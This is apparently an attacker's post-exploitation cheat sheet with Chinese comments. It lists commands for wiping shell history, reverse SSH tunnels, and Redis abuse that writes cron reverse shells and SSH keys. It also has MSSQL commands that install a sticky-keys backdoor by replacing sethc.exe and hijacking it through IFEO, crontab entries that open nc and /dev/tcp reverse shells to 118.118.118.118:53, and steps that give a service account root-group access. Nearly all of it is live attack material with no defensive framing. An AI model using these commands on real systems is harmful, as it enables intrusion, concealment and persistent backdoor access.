# 用Mac的优势!!!    
brew install proxychains-ng

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
python -c 'import pty; pty.spawn("/bin/sh")'
ssh -C -f -N -g -R 3389:10.0.0.1:3389 [email protected]

plink.exe -C -N -R 3389:127.0.0.1:3389 [email protected] -pw 123456 -P 443

set 0 "\n\n\n* * * * * bash -i >& /dev/tcp/118.118.118.118/53 0>&1\n\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
config set dir /var/lib/redis
config set dbfilename dump.rdb

cat foo.txt | redis-cli -h 10.10.10.10 -x set 0
config set dir /root/.ssh
config set dbfilename "authorized_keys"

# MSSQL 替换系统文件
declare @o int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\system32\cmd.exe','c:\windows\system32\sethc.exe';

# IFEO劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',
@value_name='Debugger',
@type='REG_SZ',
@value='c:\windows\system32\cmd.exe'

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

(crontab -l;echo '*/60 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc  -w 3 118.118.118.118 53 >/tmp/yum.log')|crontab -
(crontab -l;echo '*/5 * * * * rm /tmp/yum.log;mkfifo /tmp/yum.log;cat /tmp/yum.log|/bin/sh -i 2>&1|/usr/bin/nc 118.118.118.118 53 >/tmp/yum.log')|crontab -

(crontab -l;echo '*/1 * * * * exec 9<> /dev/tcp/118.118.118.118/53;exec 0<&9;exec 1>&9 2>&1;/bin/bash --noprofile -i')|crontab -

# 替换用户shell    
usermod -s /bin/bash ntp
usermod -g root ntp # 给予root权限
passwd ntp # 加个密码，改个/etc/passwd id = 0